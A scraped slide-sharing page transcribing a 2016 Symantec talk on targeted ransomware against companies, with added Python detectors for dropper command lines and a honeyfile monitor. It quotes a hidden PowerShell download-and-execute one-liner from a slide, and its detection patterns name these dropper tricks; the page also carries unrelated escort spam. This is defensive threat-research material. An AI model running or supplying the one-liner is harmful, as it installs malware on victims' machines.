Copyright 2016, Symantec Corporation
Candid Wüest
Symantec Security Response
Corporations – the new victims of targeted ransomware
Ransomware is popular… because it is profitable
(Image: © Forbes)
Why?
What if there were no hypothetical questions?
Because it is profitable!
$209 million damage, January to March 2016 (according to the FBI)
A clear conscience is usually the sign of a bad memory.
The common infection vector
• Email
– Link to malicious file on Dropbox & Co.
– Office document with malicious macro
– Script file (JavaScript, VBS, PowerShell, …)
• Sometimes in a password-protected container (Zip, RAR, HTA, WSF, LNK, …)
• Infected websites
– Web exploit toolkits (1.4 million attacks blocked per day)
• Rig, Magnitude etc.
– Malvertisement
• With any coding language out there
– Incl. Python, PowerShell, JS, Google's Go language, …
Hard work never killed anyone, but why take the chance?
Enabling Macros with Social Engineering
I don’t suffer from insanity; I enjoy every minute of it.
Infection dropper trends
• Use of scripting languages to evade detection/sandboxes
– Obfuscated: JavaScript, PHP, PowerShell, Python, VBS, …
– JS conditional compilation trick /*@cc_on @*/
– Macro to check for VM (environment checks)
• "InkPicture_Painted" instead of Document_Open() or AutoOpen() as the trigger
• Application.RecentFiles.Count < 3
– Script to check IPs before payload download (e.g. MaxMind service)
• Payload execution
– Execute DLL with rundll32.exe and export string
– Seed parameter from JS (to decrypt payload)
– Encrypted archive or installer package
PowerShell download-and-execute one-liner shown on the slide (URL masked):
powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -command $f=[System.IO.Path]::GetTempFileName();(New-Object System.Net.WebClient).DownloadFile('http://********liedsocialinnovation.org/plugins/office365', $f);(New-Object -com WScript.Shell).Exec($f)
2 + 2 = 5 for extremely large values of 2!
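Added example (not from the slides or Symantec): detection logic in Python that scans constructed command-line, macro and script artifacts for the dropper tricks the slide lists (ExecutionPolicy Bypass, hidden window, WebClient download to a temp file, WScript.Shell Exec, rundll32 with export, the InkPicture_Painted trigger, the RecentFiles.Count check, the @cc_on trick); indicator weights and the alert threshold are assumptions.

```python
import re
from typing import Dict, List, Tuple

# Indicator name -> (pattern, weight). Patterns follow the tricks on the
# slide; the weights and the triage threshold are illustrative assumptions.
INDICATORS: Dict[str, Tuple[re.Pattern, int]] = {
    "ps_executionpolicy_bypass": (re.compile(r"-(?:ep|exec|executionpolicy)\s+bypass", re.I), 2),
    "ps_hidden_window":          (re.compile(r"-(?:w|win|windowstyle)\s+hidden", re.I), 2),
    "ps_webclient_download":     (re.compile(r"Net\.WebClient.*?\.DownloadFile\(", re.I | re.S), 3),
    "ps_tempfile_drop":          (re.compile(r"GetTempFileName\(\)", re.I), 1),
    "wscript_shell_exec":        (re.compile(r"WScript\.Shell['\"]?\)\.Exec\(", re.I), 3),
    "rundll32_with_export":      (re.compile(r"\brundll32(?:\.exe)?\s+\S+\.dll\s*,\s*\w+", re.I), 2),
    "vba_inkpicture_trigger":    (re.compile(r"\bInkPicture\w*_Painted\b", re.I), 3),
    "vba_recentfiles_check":     (re.compile(r"Application\.RecentFiles\.Count\s*<", re.I), 3),
    "js_conditional_compilation": (re.compile(r"/\*@cc_on\b", re.I), 2),
}

# Constructed sample telemetry: process command lines, an extracted macro
# and a script attachment. The download URL is a placeholder, not a real site.
SAMPLE_EVENTS: List[dict] = [
    {"host": "WS-017", "source": "process_cmdline", "artifact":
        "powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -command "
        "$f=[System.IO.Path]::GetTempFileName();(New-Object System.Net.WebClient)"
        ".DownloadFile('http://download.example.invalid/plugins/office365', $f);"
        "(New-Object -com WScript.Shell).Exec($f)"},
    {"host": "WS-017", "source": "process_cmdline", "artifact":
        r"rundll32.exe C:\Users\Public\upd.dll,DllRegisterServer"},
    {"host": "WS-042", "source": "process_cmdline", "artifact":
        r'powershell.exe -NoProfile -Command "Get-ChildItem C:\Logs | Measure-Object"'},
    {"host": "WS-042", "source": "vba_macro", "artifact":
        "Private Sub InkPicture1_Painted(ByVal Sender As Object, ByVal e As Object)\n"
        "    If Application.RecentFiles.Count < 3 Then Exit Sub\n"
        "    ' ... next stage would follow here\n"
        "End Sub"},
    {"host": "WS-042", "source": "js_attachment", "artifact":
        "/*@cc_on @*/ var x = 1; /*@if (@_jscript) x = 2; @end @*/"},
]


def scan(artifact: str) -> Dict[str, int]:
    """Return {indicator: weight} for every indicator present in the artifact."""
    return {name: weight for name, (pattern, weight) in INDICATORS.items()
            if pattern.search(artifact)}


def risk_score(artifact: str) -> int:
    """Sum of the weights of all matched indicators."""
    return sum(scan(artifact).values())


def triage(events: List[dict], threshold: int = 5) -> List[dict]:
    """Return one alert per event whose score reaches the threshold.

    A single indicator (e.g. rundll32 with an export) stays below it; the
    slide's combination of tricks, or the macro's trigger plus VM check,
    clears it.
    """
    flagged = []
    for event in events:
        hits = scan(event["artifact"])
        score = sum(hits.values())
        if score >= threshold:
            flagged.append({"host": event["host"], "source": event["source"],
                            "score": score, "indicators": sorted(hits)})
    return flagged


if __name__ == "__main__":
    for alert in triage(SAMPLE_EVENTS):
        print(alert)
```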
Powershell ransomware
I used to be indecisive. Now I'm not sure.
Ransomware Cryptolocker expansion
100 new families identified in 2015
77 in 2014, 88 in 2016*
CAPS LOCK – Preventing Login Since 1980.
Ransomware-as-a-service
I'd like to help you out, which way did you come in?
Top 10 infections on 29.10.2016
… error joke not found
Show me the money
Average ransom demand per year (chart): 2014: $372.53; 2015: $294.14; 2016: $679.65
• Ransom is usually requested in Bitcoins
• The average ransom has more than doubled last year
Artificial intelligence is no match for natural stupidity.
How to make even more money?
• Payment features
– Tesla chat support and free sample decryption
– CryptXXX steals Bitcoin wallet data
– Cerber adds machines to a botnet to carry out DDoS attacks
– Use of Amazon/iTunes/phone gift cards instead of Bitcoins
• New threats added to the ransom note
– Chimera threatens to post personal data online
– Jigsaw deletes random files over time
– Stampado re-encrypts files already encrypted by other cryptolockers
– Virlock spreads to shares and cloud storage as a file infector
I didn't say it was your fault, I said I was blaming you.
Where are the victims?
Share of victims by country (map): United States 31%, Japan 8%, Germany 4%, Australia 4%, Canada 3%, India 3%, Italy 3%; the United Kingdom, Belgium and the Netherlands also appear (8%, 5% and 2% between them; the assignment is not recoverable from the extracted map)
Currently big wave in Brazil
Is “NO” the correct answer to this question?
Businesses as a target
43% of ransomware infections occur inside organizations
Employees like to open private emails at work
Smith & Wesson: The original point and click interface.
Advanced attack techniques
Recent ransomware attacks use tactics and techniques typically seen in “APT”-style attacks:
Infiltration: Exploit server-side vulnerabilities to gain access to the network.
Reconnaissance: Attackers gather information that may help in later stages of the attack, such as the back-up policy. Information gathered may also be used in the ransom note.
Lateral movement: Attackers use publicly available tools to plot out and traverse the network and gain access to strategic locations like ICS or DB systems.
Stealth: Once the attack has been successfully carried out, the attackers attempt to hide their tracks by removing any tools used.
What happens if you get scared half to death, twice?
Example: SamSam case
• Entry point was an unpatched web server; exploited a JBoss vulnerability with JexBoss
• Used PsExec and retrieved passwords to traverse the network
• Deleted backups to make recovery difficult
• Deployed the SamSam strain of ransomware
• Removed copies of the malware and associated tools to hide tracks
• Ransom was 1.5 Bitcoin (~US$989) for each computer
Everyone is entitled to his own opinion, but not to his own facts.
Further TTPs seen
• Attack remote access tools
– Brute-forcing passwords for RDP, TeamViewer, VNC, FTP, …
• Exploit a web server and jump further from there
– SQL injection to modify DB content
• Spear phishing
• Some groups try POS or BEC scams first, and then move to ransomware
• Some “APT” groups use ransomware instead of a wiper to hide their intention
Not very sophisticated, but often successful
I can explain it to you, but I cannot understand it for you.
What are they after?
• Documents
• Databases (encrypt data or change the password)
• File shares/cloud (even if not mapped: passwords from Mimikatz or enumeration tools)
• Websites
– E.g. added mcrypt_encrypt() to DB calls
• The backups (to delete them, infect them or encrypt them)
• In some rare cases industrial controllers; more likely classical blackmailing
If I agreed with you we’d both be wrong
Victim organization profile
• Services: 37.8%
• Manufacturing: 17.2%
• Public Administration: 10.2%
• Finance, Insurance, & Real Estate: 9.8%
• Wholesale: 8.9%
• Transportation, Comms, & Utilities: 6.6%
• Retail: 4.3%
• Construction: 3.9%
• Mining: 1.0%
• Agri, Forestry, & Fishing: 0.5%
What about Healthcare? Healthcare is seeing more targeted attacks and is therefore not reflected in the numbers.
All generalizations are false.
Crypto is difficult (for most people)
Press SPACEBAR once to quit or twice to save changes..
Protection strategies
• Back up your data (out of reach!)
• Keep your system and software up to date
• Double-check shared folders
– Does it auto-sync to the cloud?
– How is your file server protected?
• Follow best practices (2FA, security software, …)
– Disable scripts, PowerShell etc. if you don't use them
• Be prepared: play the exercise drill
• Some have experimented with “honeyfiles” and “folder sinkholes”
Always remember you're unique, just like everyone else.
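Added example (not from the slides or Symantec) of the honeyfile idea mentioned above: plant low-entropy decoy documents, baseline their hashes, and raise an alert when a decoy is rewritten (with an entropy check to spot ciphertext), deleted, or joined by a ransom-note-looking file. The decoy names, the entropy threshold and the note-name heuristic are assumptions.

```python
import hashlib
import math
import os
import tempfile
from collections import Counter
from typing import Dict, List

# Decoy names are an assumption: a leading "!" sorts first in most directory
# listings, so a walker that encrypts in sort order touches the decoys early.
DECOY_NAMES = ["!!_accounts_2016.xlsx", "!!_passwords.docx", "~payroll_backup.pdf"]
ENTROPY_ALERT = 7.0   # bits per byte; the plain-text decoys sit well below this
NOTE_WORDS = ("decrypt", "recover", "restore", "readme", "how_to", "help")


def shannon_entropy(data: bytes) -> float:
    """Bits of entropy per byte; ciphertext and compressed data approach 8.0."""
    if not data:
        return 0.0
    total = len(data)
    return -sum(c / total * math.log2(c / total) for c in Counter(data).values())


def plant_honeyfiles(directory: str) -> Dict[str, str]:
    """Write low-entropy decoys and return a name -> sha256 baseline."""
    baseline = {}
    for name in DECOY_NAMES:
        content = (f"DECOY {name} - do not open, monitored file\n" * 40).encode()
        with open(os.path.join(directory, name), "wb") as fh:
            fh.write(content)
        baseline[name] = hashlib.sha256(content).hexdigest()
    return baseline


def ransom_note_like(filename: str) -> bool:
    """Heuristic (assumption): note-style words plus a text/html/hta extension."""
    lowered = filename.lower()
    return lowered.endswith((".txt", ".html", ".hta")) and any(w in lowered for w in NOTE_WORDS)


def check_honeyfiles(directory: str, baseline: Dict[str, str]) -> List[dict]:
    """Compare the decoys with the baseline: one alert per missing or changed
    decoy, plus one per new ransom-note-looking file beside them."""
    alerts = []
    for name, digest in baseline.items():
        path = os.path.join(directory, name)
        if not os.path.exists(path):
            alerts.append({"file": name, "event": "missing"})
            continue
        with open(path, "rb") as fh:
            data = fh.read()
        if hashlib.sha256(data).hexdigest() != digest:
            ent = shannon_entropy(data)
            alerts.append({"file": name, "event": "modified",
                           "entropy": round(ent, 2),
                           "looks_encrypted": ent >= ENTROPY_ALERT})
    for entry in sorted(os.listdir(directory)):
        if entry not in baseline and ransom_note_like(entry):
            alerts.append({"file": entry, "event": "ransom_note"})
    return alerts


def demo() -> List[dict]:
    """Plant decoys in a scratch directory, then simulate what an encryptor
    leaves behind (constructed: random bytes, one deletion, a note file)."""
    workdir = tempfile.mkdtemp(prefix="honeyfiles_")
    baseline = plant_honeyfiles(workdir)
    assert check_honeyfiles(workdir, baseline) == []   # quiet while untouched
    with open(os.path.join(workdir, DECOY_NAMES[0]), "wb") as fh:
        fh.write(os.urandom(4096))                      # stands in for ciphertext
    os.remove(os.path.join(workdir, DECOY_NAMES[1]))
    with open(os.path.join(workdir, "HOW_TO_DECRYPT.txt"), "w") as fh:
        fh.write("constructed note text\n")
    return check_honeyfiles(workdir, baseline)


if __name__ == "__main__":
    for alert in demo():
        print(alert)
```

In production the check would run from a scheduled task or a file-system watcher and the "modified" alert with looks_encrypted set would trigger isolation of the writing host; the decoys themselves must be excluded from backup jobs and sync clients so legitimate tooling does not trip the monitor.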
Don’t forget your phones
• Android ransomware is out there
• IoT device ransomware not seen at large in the wild, but possible
Summary – keep your data safe!
• 100 new families identified in 2015, most not sophisticated
• Scripts are popular to evade first-step detection
• Employees in organizations represent 43% of infections
• There are ransomware groups going after organizations
• Most attacks are not targeted, but still devastating
• It is profitable for the attackers, so it won’t go away overnight
Better to understand a little than to misunderstand a lot.
Thank you!
Copyright © 2016 Symantec Corporation. All rights reserved. Symantec and the Symantec Logo are
trademarks or registered trademarks of Symantec Corporation or its affiliates in the U.S. and other
countries. Other names may be trademarks of their respective owners.
This document is provided for informational purposes only and is not intended as advertising. All
warranties relating to the information in this document, either express or implied, are disclaimed to the
maximum extent allowed by law. The information in this document is subject to change without notice.
Threat Researcher - Symantec Security Response
Candid Wüest
I like birthdays, but I think too many can kill you.

App secforum2014 andrivet-cplusplus11-metaprogramming_applied_to_software_obf...App secforum2014 andrivet-cplusplus11-metaprogramming_applied_to_software_obf...
App secforum2014 andrivet-cplusplus11-metaprogramming_applied_to_software_obf...
 
Killing any security product … using a Mimikatz undocumented feature
Killing any security product … using a Mimikatz undocumented featureKilling any security product … using a Mimikatz undocumented feature
Killing any security product … using a Mimikatz undocumented feature
 
Rump attaque usb_caralinda_fabrice
Rump attaque usb_caralinda_fabriceRump attaque usb_caralinda_fabrice
Rump attaque usb_caralinda_fabrice
 
Operation emmental appsec
Operation emmental appsecOperation emmental appsec
Operation emmental appsec
 
Hacking the swisscom modem
Hacking the swisscom modemHacking the swisscom modem
Hacking the swisscom modem
 
Colt sp sec2014_appsec-nf-vfinal
Colt sp sec2014_appsec-nf-vfinalColt sp sec2014_appsec-nf-vfinal
Colt sp sec2014_appsec-nf-vfinal
 
Asfws2014 tproxy
Asfws2014 tproxyAsfws2014 tproxy
Asfws2014 tproxy
 
Asfws 2014 slides why .net needs ma-cs and other serial(-ization) tales_v2.0
Asfws 2014 slides why .net needs ma-cs and other serial(-ization) tales_v2.0Asfws 2014 slides why .net needs ma-cs and other serial(-ization) tales_v2.0
Asfws 2014 slides why .net needs ma-cs and other serial(-ization) tales_v2.0
 
Appsec rump reverse-i_os_machook
Appsec rump reverse-i_os_machookAppsec rump reverse-i_os_machook
Appsec rump reverse-i_os_machook
 

Kürzlich hochgeladen

5 Signs You Need a Fashion PLM Software.pdf
5 Signs You Need a Fashion PLM Software.pdf5 Signs You Need a Fashion PLM Software.pdf
5 Signs You Need a Fashion PLM Software.pdfWave PLM
 
Learn the Fundamentals of XCUITest Framework_ A Beginner's Guide.pdf
Learn the Fundamentals of XCUITest Framework_ A Beginner's Guide.pdfLearn the Fundamentals of XCUITest Framework_ A Beginner's Guide.pdf
Learn the Fundamentals of XCUITest Framework_ A Beginner's Guide.pdfkalichargn70th171
 
The Real-World Challenges of Medical Device Cybersecurity- Mitigating Vulnera...
The Real-World Challenges of Medical Device Cybersecurity- Mitigating Vulnera...The Real-World Challenges of Medical Device Cybersecurity- Mitigating Vulnera...
The Real-World Challenges of Medical Device Cybersecurity- Mitigating Vulnera...ICS
 
Unlocking the Future of AI Agents with Large Language Models
Unlocking the Future of AI Agents with Large Language ModelsUnlocking the Future of AI Agents with Large Language Models
Unlocking the Future of AI Agents with Large Language Modelsaagamshah0812
 
TECUNIQUE: Success Stories: IT Service provider
TECUNIQUE: Success Stories: IT Service providerTECUNIQUE: Success Stories: IT Service provider
TECUNIQUE: Success Stories: IT Service providermohitmore19
 
Diamond Application Development Crafting Solutions with Precision
Diamond Application Development Crafting Solutions with PrecisionDiamond Application Development Crafting Solutions with Precision
Diamond Application Development Crafting Solutions with PrecisionSolGuruz
 
Steps To Getting Up And Running Quickly With MyTimeClock Employee Scheduling ...
Steps To Getting Up And Running Quickly With MyTimeClock Employee Scheduling ...Steps To Getting Up And Running Quickly With MyTimeClock Employee Scheduling ...
Steps To Getting Up And Running Quickly With MyTimeClock Employee Scheduling ...MyIntelliSource, Inc.
 
Right Money Management App For Your Financial Goals
Right Money Management App For Your Financial GoalsRight Money Management App For Your Financial Goals
Right Money Management App For Your Financial GoalsJhone kinadey
 
How To Use Server-Side Rendering with Nuxt.js
How To Use Server-Side Rendering with Nuxt.jsHow To Use Server-Side Rendering with Nuxt.js
How To Use Server-Side Rendering with Nuxt.jsAndolasoft Inc
 
Software Quality Assurance Interview Questions
Software Quality Assurance Interview QuestionsSoftware Quality Assurance Interview Questions
Software Quality Assurance Interview QuestionsArshad QA
 
CALL ON ➥8923113531 🔝Call Girls Kakori Lucknow best sexual service Online ☂️
CALL ON ➥8923113531 🔝Call Girls Kakori Lucknow best sexual service Online  ☂️CALL ON ➥8923113531 🔝Call Girls Kakori Lucknow best sexual service Online  ☂️
CALL ON ➥8923113531 🔝Call Girls Kakori Lucknow best sexual service Online ☂️anilsa9823
 
Short Story: Unveiling the Reasoning Abilities of Large Language Models by Ke...
Short Story: Unveiling the Reasoning Abilities of Large Language Models by Ke...Short Story: Unveiling the Reasoning Abilities of Large Language Models by Ke...
Short Story: Unveiling the Reasoning Abilities of Large Language Models by Ke...kellynguyen01
 
Optimizing AI for immediate response in Smart CCTV
Optimizing AI for immediate response in Smart CCTVOptimizing AI for immediate response in Smart CCTV
Optimizing AI for immediate response in Smart CCTVshikhaohhpro
 
Tech Tuesday-Harness the Power of Effective Resource Planning with OnePlan’s ...
Tech Tuesday-Harness the Power of Effective Resource Planning with OnePlan’s ...Tech Tuesday-Harness the Power of Effective Resource Planning with OnePlan’s ...
Tech Tuesday-Harness the Power of Effective Resource Planning with OnePlan’s ...OnePlan Solutions
 
HR Software Buyers Guide in 2024 - HRSoftware.com
HR Software Buyers Guide in 2024 - HRSoftware.comHR Software Buyers Guide in 2024 - HRSoftware.com
HR Software Buyers Guide in 2024 - HRSoftware.comFatema Valibhai
 
A Secure and Reliable Document Management System is Essential.docx
A Secure and Reliable Document Management System is Essential.docxA Secure and Reliable Document Management System is Essential.docx
A Secure and Reliable Document Management System is Essential.docxComplianceQuest1
 
Shapes for Sharing between Graph Data Spaces - and Epistemic Querying of RDF-...
Shapes for Sharing between Graph Data Spaces - and Epistemic Querying of RDF-...Shapes for Sharing between Graph Data Spaces - and Epistemic Querying of RDF-...
Shapes for Sharing between Graph Data Spaces - and Epistemic Querying of RDF-...Steffen Staab
 
How To Troubleshoot Collaboration Apps for the Modern Connected Worker
How To Troubleshoot Collaboration Apps for the Modern Connected WorkerHow To Troubleshoot Collaboration Apps for the Modern Connected Worker
How To Troubleshoot Collaboration Apps for the Modern Connected WorkerThousandEyes
 

Kürzlich hochgeladen (20)

5 Signs You Need a Fashion PLM Software.pdf
5 Signs You Need a Fashion PLM Software.pdf5 Signs You Need a Fashion PLM Software.pdf
5 Signs You Need a Fashion PLM Software.pdf
 
Learn the Fundamentals of XCUITest Framework_ A Beginner's Guide.pdf
Learn the Fundamentals of XCUITest Framework_ A Beginner's Guide.pdfLearn the Fundamentals of XCUITest Framework_ A Beginner's Guide.pdf
Learn the Fundamentals of XCUITest Framework_ A Beginner's Guide.pdf
 
The Real-World Challenges of Medical Device Cybersecurity- Mitigating Vulnera...
The Real-World Challenges of Medical Device Cybersecurity- Mitigating Vulnera...The Real-World Challenges of Medical Device Cybersecurity- Mitigating Vulnera...
The Real-World Challenges of Medical Device Cybersecurity- Mitigating Vulnera...
 
Unlocking the Future of AI Agents with Large Language Models
Unlocking the Future of AI Agents with Large Language ModelsUnlocking the Future of AI Agents with Large Language Models
Unlocking the Future of AI Agents with Large Language Models
 
TECUNIQUE: Success Stories: IT Service provider
TECUNIQUE: Success Stories: IT Service providerTECUNIQUE: Success Stories: IT Service provider
TECUNIQUE: Success Stories: IT Service provider
 
Diamond Application Development Crafting Solutions with Precision
Diamond Application Development Crafting Solutions with PrecisionDiamond Application Development Crafting Solutions with Precision
Diamond Application Development Crafting Solutions with Precision
 
Steps To Getting Up And Running Quickly With MyTimeClock Employee Scheduling ...
Steps To Getting Up And Running Quickly With MyTimeClock Employee Scheduling ...Steps To Getting Up And Running Quickly With MyTimeClock Employee Scheduling ...
Steps To Getting Up And Running Quickly With MyTimeClock Employee Scheduling ...
 
Right Money Management App For Your Financial Goals
Right Money Management App For Your Financial GoalsRight Money Management App For Your Financial Goals
Right Money Management App For Your Financial Goals
 
How To Use Server-Side Rendering with Nuxt.js
How To Use Server-Side Rendering with Nuxt.jsHow To Use Server-Side Rendering with Nuxt.js
How To Use Server-Side Rendering with Nuxt.js
 
Software Quality Assurance Interview Questions
Software Quality Assurance Interview QuestionsSoftware Quality Assurance Interview Questions
Software Quality Assurance Interview Questions
 
CALL ON ➥8923113531 🔝Call Girls Kakori Lucknow best sexual service Online ☂️
CALL ON ➥8923113531 🔝Call Girls Kakori Lucknow best sexual service Online  ☂️CALL ON ➥8923113531 🔝Call Girls Kakori Lucknow best sexual service Online  ☂️
CALL ON ➥8923113531 🔝Call Girls Kakori Lucknow best sexual service Online ☂️
 
Short Story: Unveiling the Reasoning Abilities of Large Language Models by Ke...
Short Story: Unveiling the Reasoning Abilities of Large Language Models by Ke...Short Story: Unveiling the Reasoning Abilities of Large Language Models by Ke...
Short Story: Unveiling the Reasoning Abilities of Large Language Models by Ke...
 
Optimizing AI for immediate response in Smart CCTV
Optimizing AI for immediate response in Smart CCTVOptimizing AI for immediate response in Smart CCTV
Optimizing AI for immediate response in Smart CCTV
 
Tech Tuesday-Harness the Power of Effective Resource Planning with OnePlan’s ...
Tech Tuesday-Harness the Power of Effective Resource Planning with OnePlan’s ...Tech Tuesday-Harness the Power of Effective Resource Planning with OnePlan’s ...
Tech Tuesday-Harness the Power of Effective Resource Planning with OnePlan’s ...
 
HR Software Buyers Guide in 2024 - HRSoftware.com
HR Software Buyers Guide in 2024 - HRSoftware.comHR Software Buyers Guide in 2024 - HRSoftware.com
HR Software Buyers Guide in 2024 - HRSoftware.com
 
A Secure and Reliable Document Management System is Essential.docx
A Secure and Reliable Document Management System is Essential.docxA Secure and Reliable Document Management System is Essential.docx
A Secure and Reliable Document Management System is Essential.docx
 
Shapes for Sharing between Graph Data Spaces - and Epistemic Querying of RDF-...
Shapes for Sharing between Graph Data Spaces - and Epistemic Querying of RDF-...Shapes for Sharing between Graph Data Spaces - and Epistemic Querying of RDF-...
Shapes for Sharing between Graph Data Spaces - and Epistemic Querying of RDF-...
 
Microsoft AI Transformation Partner Playbook.pdf
Microsoft AI Transformation Partner Playbook.pdfMicrosoft AI Transformation Partner Playbook.pdf
Microsoft AI Transformation Partner Playbook.pdf
 
How To Troubleshoot Collaboration Apps for the Modern Connected Worker
How To Troubleshoot Collaboration Apps for the Modern Connected WorkerHow To Troubleshoot Collaboration Apps for the Modern Connected Worker
How To Troubleshoot Collaboration Apps for the Modern Connected Worker
 
Vip Call Girls Noida ➡️ Delhi ➡️ 9999965857 No Advance 24HRS Live
Vip Call Girls Noida ➡️ Delhi ➡️ 9999965857 No Advance 24HRS LiveVip Call Girls Noida ➡️ Delhi ➡️ 9999965857 No Advance 24HRS Live
Vip Call Girls Noida ➡️ Delhi ➡️ 9999965857 No Advance 24HRS Live
 

Corporations - the new victims of targeted ransomware

Slide 1
Copyright 2016, Symantec Corporation
Corporations – the new victims of targeted ransomware
Candid Wüest, Symantec Security Response
Slide 4: WHY?
Slide 5: Because it is profitable!
$209 Million damage, Jan–March 2016 (according to FBI)
Slide 6: The common infection vector
• Email
  – Link to malicious file on Dropbox & Co.
  – Office document with malicious macro
  – Script file (JavaScript, VBS, PowerShell, …)
    • Sometimes in a container (Zip, RAR, HTA, WSF, LNK, …) with password
• Infected websites
  – Web exploit toolkits (1.4 Mio attacks blocked / day)
    • Rig, Magnitude etc.
  – Malvertisement
• With any coding language out there
  – Incl. Python, PowerShell, JS, Google's Go language, …
Slide 7: Enabling Macros with Social Engineering
Slide 8: Infection dropper trends
Use of scripting languages to evade detection/sandboxes
– Obfuscated: JavaScript, PHP, PowerShell, Python, VBS, …
– JS conditional compilation trick /*@cc_on @*/
– Macro to check for VM (environment checks)
  • "InkPicture_Painted" instead of the Document_Open() or AutoOpen() trigger
  • Application.RecentFiles.Count < 3
– Script to check IPs before payload download (e.g. MaxMind service)
• Payload execution
– Execute DLL with rundll32.exe and export string
– Seed parameter from JS (to decrypt payload)
– Encrypted archive or installer package
Dropper command line shown on the slide (URL partially masked on the slide):
powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -command $f=[System.IO.Path]::GetTempFileName();(New-Object System.Net.WebClient).DownloadFile('http://********lied
socialinnovation.org/plugins/office365', $f); (New-Object -com WScript.Shell).Exec($f)
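A defender-side triage of process-creation command lines that scores the dropper traits listed on this slide (ExecutionPolicy Bypass, hidden window, WebClient download, rundll32 with an export string, script hosts running files from Temp, an Office parent process). This is an added example, not code from the slides; the log records and the host dropper.example.invalid are constructed.

```python
import re

# Constructed sample process-creation records (parent image, command line),
# in the shape a Sysmon/EDR event would carry them. Not real telemetry.
SAMPLE_EVENTS = [
    ("winword.exe",
     "powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -command "
     "$f=[System.IO.Path]::GetTempFileName();(New-Object System.Net.WebClient)"
     ".DownloadFile('http://dropper.example.invalid/plugins/office365', $f);"
     "(New-Object -com WScript.Shell).Exec($f)"),
    ("explorer.exe",
     "wscript.exe C:\\Users\\bob\\AppData\\Local\\Temp\\invoice_2016.js"),
    ("cmd.exe",
     "rundll32.exe C:\\Users\\bob\\AppData\\Local\\Temp\\a.dll,StartW"),
    ("explorer.exe", "powershell.exe -NoProfile -File C:\\scripts\\backup.ps1"),
    ("services.exe", "rundll32.exe shell32.dll,Control_RunDLL"),
]

OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_IMAGES = {"powershell.exe", "wscript.exe", "cscript.exe", "cmd.exe", "rundll32.exe"}
TEMP_DIR = re.compile(r"\\appdata\\local\\temp\\", re.I)
RUNDLL_EXPORT = re.compile(r"rundll32(\.exe)?\s+\S+\.dll,\S+", re.I)
SCRIPT_FILE = re.compile(r"\.(js|jse|vbs|vbe|wsf)\b", re.I)


def score_event(parent, cmdline):
    """Return (score, reasons): one point per dropper trait seen in the event."""
    low = cmdline.lower()
    first = low.split()[0].strip('"') if low.split() else ""
    image = first.rsplit("\\", 1)[-1]          # bare image name, path stripped
    reasons = []
    if image == "powershell.exe":
        if "-executionpolicy bypass" in low or "-ep bypass" in low:
            reasons.append("powershell: execution policy bypass")
        if "-windowstyle hidden" in low or "-w hidden" in low:
            reasons.append("powershell: hidden window")
        if "downloadfile(" in low or "downloadstring(" in low:
            reasons.append("powershell: WebClient download in command line")
        if "wscript.shell" in low:
            reasons.append("powershell: launches payload via WScript.Shell")
    elif image in ("wscript.exe", "cscript.exe") and SCRIPT_FILE.search(low):
        reasons.append("script host executing a script file")
    elif image == "rundll32.exe" and RUNDLL_EXPORT.search(low):
        # Common for legitimate software too, so this only counts with other traits.
        reasons.append("rundll32 invoked with DLL,export string")
    if TEMP_DIR.search(low):
        reasons.append("path under AppData\\Local\\Temp")
    if parent.lower() in OFFICE_PARENTS and image in SCRIPT_IMAGES:
        reasons.append(f"spawned by Office application {parent}")
    return len(reasons), reasons


def triage(events, threshold=2):
    """Flag events whose trait score reaches the threshold; returns a list of dicts."""
    flagged = []
    for index, (parent, cmdline) in enumerate(events):
        score, reasons = score_event(parent, cmdline)
        if score >= threshold:
            flagged.append({"index": index, "score": score, "reasons": reasons})
    return flagged


if __name__ == "__main__":
    for hit in triage(SAMPLE_EVENTS):
        print(f"event {hit['index']} score {hit['score']}: {'; '.join(hit['reasons'])}")
```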
Slide 10: Ransomware Cryptolocker expansion
100 new families identified in 2015
77 in 2014, 88 in 2016*
Slide 12: Top 10 infections on 29.10.2016 (chart not reproduced in the transcript)
Slide 13: Show me the money
Average ransom demand (chart):
  2014: $372.53
  2015: $294.14
  2016: $679.65
• Ransom is usually requested in Bitcoins
• The average ransom has more than doubled last year
Slide 14: How to make even more money?
• Payment features
  – Tesla chat support and free sample decryption
  – CryptXXX steals Bitcoin wallet data
  – Cerber adds machines to a botnet to carry out DDoS attacks
  – Use of Amazon/iTunes/phone gift cards instead of Bitcoins
• New threats added to the ransom note
  – Chimera threatens to post personal data online
  – Jigsaw deletes random files over time
  – Stampado re-encrypts files already encrypted by other cryptolockers
  – Virolock spreads to shares and cloud storage as a file infector
Slide 15: Where are the victims?
(World map of infection share by country: United States 31%; the other labelled countries, Canada, United Kingdom, Belgium, Netherlands, India, Italy, Germany, Australia and Japan, each between 2% and 8%.)
Currently big wave in Brazil
Slide 16: Businesses as a target
43% of ransomware infections occur inside organizations
Employees like to open private emails at work
Slide 17: Advanced attack techniques
Recent ransomware attacks use tactics and techniques typically seen in "APT"-style attacks
• Infiltration: Exploit server-side vulnerabilities to gain access to the network.
• Reconnaissance: Attackers gather information that may help in later stages of the attack, such as the back-up policy. Information gathered may also be used in the ransom note.
• Lateral movement: Attackers use publicly available tools to plot out and traverse the network and gain access to strategic locations like ICS or DB systems.
• Stealth: Once the attack has been successfully carried out, the attackers attempt to hide their tracks by removing any tools used.
Slide 18: Example: SamSam case
• Entry point was an unpatched web server; exploited a JBoss vulnerability with JexBoss
• Used PsExec and retrieved passwords to traverse the network
• Deleted backups to make recovery difficult
• Deployed the SamSam strain of ransomware
• Removed copies of the malware and associated tools to hide tracks
• Ransom was 1.5 Bitcoin (~US$989) for each computer
Slide 19: Further TTPs seen
• Attack remote access tools
  – Brute-forcing passwords for RDP, TeamViewer, VNC, FTP, …
• Exploit web server and jump further from there
  – SQL injection to modify DB content
• Spear phishing
• Some groups try POS or BEC scams first, and then move to ransomware
• Some «APT» groups use ransomware instead of a wiper to hide their intention
Not very sophisticated, but often successful
Slide 20: What are they after?
• Documents
• Databases (encrypt data or change password)
• File shares/cloud (even if not mapped: passwords from mimikatz or enumeration tools)
• Websites
  – E.g. added «mcrypt_encrypt()» to DB calls
• The backups (to delete them, infect them or encrypt them)
• In some rare cases industrial controllers; more likely classical blackmailing
Slide 21: Victim organization profile
Services 37.8%
Manufacturing 17.2%
Public Administration 10.2%
Finance, Insurance, & Real Estate 9.8%
Wholesale 8.9%
Transportation, Comms, & Utilities 6.6%
